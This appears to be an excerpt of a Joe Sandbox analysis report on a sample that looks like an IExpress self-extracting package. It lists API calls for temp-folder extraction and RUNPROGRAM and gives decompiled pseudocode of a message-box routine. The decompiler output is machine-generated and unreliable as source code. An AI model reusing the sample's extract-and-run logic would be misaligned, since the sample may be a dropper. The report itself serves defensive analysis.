                                                                                                                                                                                                                                            0x00a458a7
                                                                                                                                                                                                                                            0x00a458ac
                                                                                                                                                                                                                                            0x00a458b3
                                                                                                                                                                                                                                            0x00a458b5
                                                                                                                                                                                                                                            0x00a456a2
                                                                                                                                                                                                                                            0x00a456a2
                                                                                                                                                                                                                                            0x00a456a8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456ae
                                                                                                                                                                                                                                            0x00a456ae
                                                                                                                                                                                                                                            0x00a456b9
                                                                                                                                                                                                                                            0x00a456bf
                                                                                                                                                                                                                                            0x00a456c1
                                                                                                                                                                                                                                            0x00a456f3
                                                                                                                                                                                                                                            0x00a456f3
                                                                                                                                                                                                                                            0x00a45705
                                                                                                                                                                                                                                            0x00a4570a
                                                                                                                                                                                                                                            0x00a45711
                                                                                                                                                                                                                                            0x00a45717
                                                                                                                                                                                                                                            0x00a45724
                                                                                                                                                                                                                                            0x00a45726
                                                                                                                                                                                                                                            0x00a45729
                                                                                                                                                                                                                                            0x00a45730
                                                                                                                                                                                                                                            0x00a45737
                                                                                                                                                                                                                                            0x00a4573d
                                                                                                                                                                                                                                            0x00a45740
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4572b
                                                                                                                                                                                                                                            0x00a4572b
                                                                                                                                                                                                                                            0x00a4572e
                                                                                                                                                                                                                                            0x00a45742
                                                                                                                                                                                                                                            0x00a45742
                                                                                                                                                                                                                                            0x00a45745
                                                                                                                                                                                                                                            0x00a4576b
                                                                                                                                                                                                                                            0x00a4576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45747
                                                                                                                                                                                                                                            0x00a45747
                                                                                                                                                                                                                                            0x00a4574d
                                                                                                                                                                                                                                            0x00a4574f
                                                                                                                                                                                                                                            0x00a45771
                                                                                                                                                                                                                                            0x00a45771
                                                                                                                                                                                                                                            0x00a45773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45751
                                                                                                                                                                                                                                            0x00a45751
                                                                                                                                                                                                                                            0x00a45753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45755
                                                                                                                                                                                                                                            0x00a4575b
                                                                                                                                                                                                                                            0x00a45760
                                                                                                                                                                                                                                            0x00a45762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45764
                                                                                                                                                                                                                                            0x00a45764
                                                                                                                                                                                                                                            0x00a45769
                                                                                                                                                                                                                                            0x00a4577e
                                                                                                                                                                                                                                            0x00a4577e
                                                                                                                                                                                                                                            0x00a45781
                                                                                                                                                                                                                                            0x00a45788
                                                                                                                                                                                                                                            0x00a4578d
                                                                                                                                                                                                                                            0x00a4578f
                                                                                                                                                                                                                                            0x00a457b2
                                                                                                                                                                                                                                            0x00a457b8
                                                                                                                                                                                                                                            0x00a457bd
                                                                                                                                                                                                                                            0x00a457bf
                                                                                                                                                                                                                                            0x00a457cd
                                                                                                                                                                                                                                            0x00a457cd
                                                                                                                                                                                                                                            0x00a457dd
                                                                                                                                                                                                                                            0x00a457e3
                                                                                                                                                                                                                                            0x00a457ef
                                                                                                                                                                                                                                            0x00a457f5
                                                                                                                                                                                                                                            0x00a457f8
                                                                                                                                                                                                                                            0x00a4580a
                                                                                                                                                                                                                                            0x00a4580a
                                                                                                                                                                                                                                            0x00a457fa
                                                                                                                                                                                                                                            0x00a45802
                                                                                                                                                                                                                                            0x00a45802
                                                                                                                                                                                                                                            0x00a4580d
                                                                                                                                                                                                                                            0x00a4580f
                                                                                                                                                                                                                                            0x00a45830
                                                                                                                                                                                                                                            0x00a45836
                                                                                                                                                                                                                                            0x00a4583d
                                                                                                                                                                                                                                            0x00a4584b
                                                                                                                                                                                                                                            0x00a45851
                                                                                                                                                                                                                                            0x00a45855
                                                                                                                                                                                                                                            0x00a4585a
                                                                                                                                                                                                                                            0x00a4585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4585e
                                                                                                                                                                                                                                            0x00a4585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4585e
                                                                                                                                                                                                                                            0x00a45811
                                                                                                                                                                                                                                            0x00a45817
                                                                                                                                                                                                                                            0x00a45819
                                                                                                                                                                                                                                            0x00a4581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4581f
                                                                                                                                                                                                                                            0x00a45791
                                                                                                                                                                                                                                            0x00a45797
                                                                                                                                                                                                                                            0x00a4579c
                                                                                                                                                                                                                                            0x00a4579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a457a0
                                                                                                                                                                                                                                            0x00a457a9
                                                                                                                                                                                                                                            0x00a457ae
                                                                                                                                                                                                                                            0x00a457b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a457b0
                                                                                                                                                                                                                                            0x00a4579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45769
                                                                                                                                                                                                                                            0x00a45762
                                                                                                                                                                                                                                            0x00a45753
                                                                                                                                                                                                                                            0x00a4574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45864
                                                                                                                                                                                                                                            0x00a45864
                                                                                                                                                                                                                                            0x00a45864
                                                                                                                                                                                                                                            0x00a45717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456c3
                                                                                                                                                                                                                                            0x00a456c5
                                                                                                                                                                                                                                            0x00a456c9
                                                                                                                                                                                                                                            0x00a456ce
                                                                                                                                                                                                                                            0x00a456d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456d6
                                                                                                                                                                                                                                            0x00a456d6
                                                                                                                                                                                                                                            0x00a456d8
                                                                                                                                                                                                                                            0x00a456dd
                                                                                                                                                                                                                                            0x00a456df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456e1
                                                                                                                                                                                                                                            0x00a456e2
                                                                                                                                                                                                                                            0x00a456e4
                                                                                                                                                                                                                                            0x00a456e6
                                                                                                                                                                                                                                            0x00a456eb
                                                                                                                                                                                                                                            0x00a456ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456f3
                                                                                                                                                                                                                                            0x00a456f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4586c
                                                                                                                                                                                                                                            0x00a45878
                                                                                                                                                                                                                                            0x00a4587e
                                                                                                                                                                                                                                            0x00a45882
                                                                                                                                                                                                                                            0x00a45883
                                                                                                                                                                                                                                            0x00a45889
                                                                                                                                                                                                                                            0x00a4588e
                                                                                                                                                                                                                                            0x00a4588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45896
                                                                                                                                                                                                                                            0x00a456ed
                                                                                                                                                                                                                                            0x00a456df
                                                                                                                                                                                                                                            0x00a456d0
                                                                                                                                                                                                                                            0x00a456c1
                                                                                                                                                                                                                                            0x00a456a8
                                                                                                                                                                                                                                            0x00a4565b
                                                                                                                                                                                                                                            0x00a4565b
                                                                                                                                                                                                                                            0x00a4565d
                                                                                                                                                                                                                                            0x00a45669
                                                                                                                                                                                                                                            0x00a45669
                                                                                                                                                                                                                                            0x00a4565f
                                                                                                                                                                                                                                            0x00a4565f
                                                                                                                                                                                                                                            0x00a45665
                                                                                                                                                                                                                                            0x00a45667
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45667
                                                                                                                                                                                                                                            0x00a4566c
                                                                                                                                                                                                                                            0x00a45673
                                                                                                                                                                                                                                            0x00a45678
                                                                                                                                                                                                                                            0x00a4567a
                                                                                                                                                                                                                                            0x00a4589b
                                                                                                                                                                                                                                            0x00a4589b
                                                                                                                                                                                                                                            0x00a45680
                                                                                                                                                                                                                                            0x00a45685
                                                                                                                                                                                                                                            0x00a4568c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4568c
                                                                                                                                                                                                                                            0x00a4567a
                                                                                                                                                                                                                                            0x00a4560e
                                                                                                                                                                                                                                            0x00a45613
                                                                                                                                                                                                                                            0x00a4561a
                                                                                                                                                                                                                                            0x00a45620
                                                                                                                                                                                                                                            0x00a45626
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45626
                                                                                                                                                                                                                                            0x00a455db
                                                                                                                                                                                                                                            0x00a455e0
                                                                                                                                                                                                                                            0x00a455e7
                                                                                                                                                                                                                                            0x00a455f1
                                                                                                                                                                                                                                            0x00a455f6
                                                                                                                                                                                                                                            0x00a455f6
                                                                                                                                                                                                                                            0x00a455f6
                                                                                                                                                                                                                                            0x00a458b7
                                                                                                                                                                                                                                            0x00a458c7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A455CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A45638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A4564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A45620
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A456B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A4571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A45737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A457CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A457EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A45802
                                                                                                                                                                                                                                              • Part of subcall function 00A42630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A42654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A45830
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FindResourceA.KERNEL32(00A40000,000007D6,00000005), ref: 00A4652A
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: LoadResource.KERNEL32(00A40000,00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A46538
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: DialogBoxIndirectParamA.USER32(00A40000,00000000,00000547,00A419E0,00000000), ref: 00A46557
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FreeResource.KERNEL32(00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A46560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A45878
                                                                                                                                                                                                                                              • Part of subcall function 00A4597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A459A8
                                                                                                                                                                                                                                              • Part of subcall function 00A4597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A459AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-3855382519
                                                                                                                                                                                                                                            • Opcode ID: f79e2004a6cc083c9a13eb3c5f635cd935f68aa07fee8bff2f5e1dac3a7149f9
                                                                                                                                                                                                                                            • Instruction ID: 9846bc6fcffcae498f53a6bf09e2904cba3a1231a7a6ef11af71a71d35a33597
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f79e2004a6cc083c9a13eb3c5f635cd935f68aa07fee8bff2f5e1dac3a7149f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB81167DE04A04ABDB20ABB49D85BEF726D9FE5340F040475F586D2193EFB48DC28A51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 a444b9-a444f8 407 a444fe-a44525 LoadStringA 406->407 408 a44679-a4467b 406->408 410 a44527-a4452e call a4681f 407->410 411 a44562-a44568 407->411 409 a4467c-a4468c call a46ce0 408->409 418 a44530-a4453d call a467c9 410->418 419 a4453f 410->419 413 a4456b-a44570 411->413 413->413 417 a44572-a4457c 413->417 420 a4457e-a44580 417->420 421 a445c9-a445cb 417->421 418->419 425 a44544-a44554 MessageBoxA 418->425 419->425 426 a44583-a44588 420->426 423 a44607-a44617 LocalAlloc 421->423 424 a445cd-a445cf 421->424 429 a4455a-a4455d 423->429 430 a4461d-a44628 call a41680 423->430 428 a445d2-a445d7 424->428 425->429 426->426 431 a4458a-a4458c 426->431 428->428 432 a445d9-a445ed LocalAlloc 428->432 429->409 436 a4462d-a4463d MessageBeep call a4681f 430->436 434 a4458f-a44594 431->434 432->429 435 a445f3-a44605 call a4171e 432->435 434->434 437 a44596-a445ad LocalAlloc 434->437 435->436 445 a4464e 436->445 446 a4463f-a4464c call a467c9 436->446 437->429 440 a445af-a445c7 call a4171e 437->440 440->436 448 a44653-a44677 MessageBoxA LocalFree 445->448 446->445 446->448 448->409
                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A444B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0xa48a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa49a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00A41680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A4171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E00A4171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E00A4681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E00A467C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E00A4681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E00A467C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a444b9
                                                                                                                                                                                                                                            0x00a444c4
                                                                                                                                                                                                                                            0x00a444cb
                                                                                                                                                                                                                                            0x00a444d8
                                                                                                                                                                                                                                            0x00a444e4
                                                                                                                                                                                                                                            0x00a444eb
                                                                                                                                                                                                                                            0x00a444ee
                                                                                                                                                                                                                                            0x00a444ef
                                                                                                                                                                                                                                            0x00a444ef
                                                                                                                                                                                                                                            0x00a444f1
                                                                                                                                                                                                                                            0x00a444f7
                                                                                                                                                                                                                                            0x00a444f8
                                                                                                                                                                                                                                            0x00a4467b
                                                                                                                                                                                                                                            0x00a444fe
                                                                                                                                                                                                                                            0x00a44509
                                                                                                                                                                                                                                            0x00a44518
                                                                                                                                                                                                                                            0x00a44525
                                                                                                                                                                                                                                            0x00a44562
                                                                                                                                                                                                                                            0x00a44568
                                                                                                                                                                                                                                            0x00a44568
                                                                                                                                                                                                                                            0x00a4456b
                                                                                                                                                                                                                                            0x00a4456b
                                                                                                                                                                                                                                            0x00a4456d
                                                                                                                                                                                                                                            0x00a4456e
                                                                                                                                                                                                                                            0x00a44572
                                                                                                                                                                                                                                            0x00a44578
                                                                                                                                                                                                                                            0x00a4457c
                                                                                                                                                                                                                                            0x00a445cb
                                                                                                                                                                                                                                            0x00a44607
                                                                                                                                                                                                                                            0x00a44607
                                                                                                                                                                                                                                            0x00a4460d
                                                                                                                                                                                                                                            0x00a44613
                                                                                                                                                                                                                                            0x00a44617
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4461d
                                                                                                                                                                                                                                            0x00a44623
                                                                                                                                                                                                                                            0x00a44626
                                                                                                                                                                                                                                            0x00a44628
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44628
                                                                                                                                                                                                                                            0x00a445cd
                                                                                                                                                                                                                                            0x00a445cd
                                                                                                                                                                                                                                            0x00a445cf
                                                                                                                                                                                                                                            0x00a445cf
                                                                                                                                                                                                                                            0x00a445d2
                                                                                                                                                                                                                                            0x00a445d2
                                                                                                                                                                                                                                            0x00a445d4
                                                                                                                                                                                                                                            0x00a445d5
                                                                                                                                                                                                                                            0x00a445db
                                                                                                                                                                                                                                            0x00a445de
                                                                                                                                                                                                                                            0x00a445e3
                                                                                                                                                                                                                                            0x00a445e9
                                                                                                                                                                                                                                            0x00a445ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a445f3
                                                                                                                                                                                                                                            0x00a445fd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44602
                                                                                                                                                                                                                                            0x00a445ed
                                                                                                                                                                                                                                            0x00a4457e
                                                                                                                                                                                                                                            0x00a4457e
                                                                                                                                                                                                                                            0x00a44580
                                                                                                                                                                                                                                            0x00a44580
                                                                                                                                                                                                                                            0x00a44583
                                                                                                                                                                                                                                            0x00a44583
                                                                                                                                                                                                                                            0x00a44585
                                                                                                                                                                                                                                            0x00a44586
                                                                                                                                                                                                                                            0x00a4458a
                                                                                                                                                                                                                                            0x00a4458c
                                                                                                                                                                                                                                            0x00a4458f
                                                                                                                                                                                                                                            0x00a4458f
                                                                                                                                                                                                                                            0x00a44591
                                                                                                                                                                                                                                            0x00a44592
                                                                                                                                                                                                                                            0x00a4459b
                                                                                                                                                                                                                                            0x00a4459e
                                                                                                                                                                                                                                            0x00a445a3
                                                                                                                                                                                                                                            0x00a445a9
                                                                                                                                                                                                                                            0x00a445ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a445af
                                                                                                                                                                                                                                            0x00a445af
                                                                                                                                                                                                                                            0x00a445bf
                                                                                                                                                                                                                                            0x00a4462d
                                                                                                                                                                                                                                            0x00a44630
                                                                                                                                                                                                                                            0x00a4463d
                                                                                                                                                                                                                                            0x00a4464e
                                                                                                                                                                                                                                            0x00a4464e
                                                                                                                                                                                                                                            0x00a4463f
                                                                                                                                                                                                                                            0x00a44640
                                                                                                                                                                                                                                            0x00a44647
                                                                                                                                                                                                                                            0x00a4464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4464c
                                                                                                                                                                                                                                            0x00a44666
                                                                                                                                                                                                                                            0x00a4466d
                                                                                                                                                                                                                                            0x00a4466f
                                                                                                                                                                                                                                            0x00a44675
                                                                                                                                                                                                                                            0x00a44675
                                                                                                                                                                                                                                            0x00a445ad
                                                                                                                                                                                                                                            0x00a44527
